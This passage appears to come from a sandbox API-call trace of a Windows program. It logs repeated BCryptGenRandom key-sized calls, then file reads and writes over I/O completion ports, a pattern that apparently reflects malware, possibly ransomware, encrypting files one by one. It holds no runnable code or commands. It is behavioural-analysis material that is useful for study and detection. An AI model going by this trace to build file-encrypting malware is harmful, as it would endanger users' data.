lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6630, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0121.276] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.316] ReadFile (in: hFile=0x13c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6b9a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0121.317] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.318] CloseHandle (hObject=0x13c0) returned 1 [0121.318] free (_Block=0x3df0008) [0121.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.360] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.360] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0121.360] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.361] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0121.361] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.361] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.361] free (_Block=0x3e305b8) [0121.361] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.361] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.362] free (_Block=0x1fa91d0) [0121.362] free (_Block=0x77d7a8) [0121.362] free (_Block=0x1fa90b8) [0121.362] WriteFile (in: hFile=0x13c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0121.362] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.452] WriteFile (in: hFile=0x13c0, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x3b30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0121.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.546] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.547] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0121.547] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.547] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0121.548] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.548] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.548] free (_Block=0x3e305b8) [0121.548] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.548] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.548] free (_Block=0x1fa91d0) [0121.548] free (_Block=0x77d7a8) [0121.548] free (_Block=0x1fa90b8) [0121.548] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.549] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.780] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x55c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.780] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.782] CloseHandle (hObject=0x2f4) returned 1 [0121.783] free (_Block=0x1ff1e60) [0121.783] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.798] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.800] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0121.801] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.801] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0121.802] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.802] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.802] free (_Block=0x3e305b8) [0121.802] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.802] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.802] free (_Block=0x1fa91d0) [0121.802] free (_Block=0x77d7a8) [0121.802] free (_Block=0x1fa90b8) [0121.802] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0121.805] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.806] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc540, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0121.807] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.833] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xfcff, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0121.864] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.878] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xabad, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0121.880] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.902] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4ed3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0121.983] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.003] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x27d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.003] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.004] CloseHandle (hObject=0x2f4) returned 1 [0122.004] free (_Block=0x3df0008) [0122.004] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.365] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.365] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0122.365] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.366] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0122.366] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0122.366] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0122.366] free (_Block=0x3e305b8) [0122.366] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0122.366] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0122.366] free (_Block=0x1fa91d0) [0122.367] free (_Block=0x77d7a8) [0122.367] free (_Block=0x1fa90b8) [0122.367] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.368] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.443] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5ef0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.444] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.454] CloseHandle (hObject=0x2f4) returned 1 [0122.455] free (_Block=0x3df0008) [0122.455] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.465] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.466] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0122.466] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.466] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0122.467] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0122.467] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0122.467] free (_Block=0x3e305b8) [0122.467] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0122.467] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0122.467] free (_Block=0x1fa91d0) [0122.467] free (_Block=0x77d7a8) [0122.467] free (_Block=0x1fa90b8) [0122.468] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.468] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.471] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2240, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.471] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.472] CloseHandle (hObject=0x2f4) returned 1 [0122.472] free (_Block=0x3df0008) [0122.472] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.485] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0122.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0122.487] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0122.487] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0122.487] free (_Block=0x3e305b8) [0122.487] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0122.487] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0122.487] free (_Block=0x1fa91d0) [0122.487] free (_Block=0x77d7a8) [0122.487] free (_Block=0x1fa90b8) [0122.487] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.502] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe3a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.503] CloseHandle (hObject=0x2f4) returned 1 [0122.504] free (_Block=0x3df0008) [0122.504] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0122.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0122.514] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0122.514] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0122.514] free (_Block=0x3e305b8) [0122.514] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0122.514] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0122.514] free (_Block=0x1fa91d0) [0122.515] free (_Block=0x77d7a8) [0122.515] free (_Block=0x1fa90b8) [0122.515] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.517] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.518] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.518] CloseHandle (hObject=0x2f4) returned 1 [0122.519] free (_Block=0x3df0008) [0122.519] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.540] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.541] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0122.541] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.541] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0122.541] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0122.542] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0122.542] free (_Block=0x3e305b8) [0122.542] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0122.542] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0122.542] free (_Block=0x1fa91d0) [0122.542] free (_Block=0x77d7a8) [0122.542] free (_Block=0x1fa90b8) [0122.542] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.543] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.545] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1850, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.545] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.559] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2610, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.569] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.612] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x9b8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.613] CloseHandle (hObject=0x2f4) returned 1 [0122.613] free (_Block=0x3df0008) [0122.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.710] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.710] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.710] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0122.711] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.711] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.711] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0122.711] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0122.711] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0122.711] free (_Block=0x3e305b8) [0122.711] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0122.711] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0122.712] free (_Block=0x1fa91d0) [0122.712] free (_Block=0x77d7a8) [0122.712] free (_Block=0x1fa90b8) [0122.712] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.712] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.766] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1510, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: 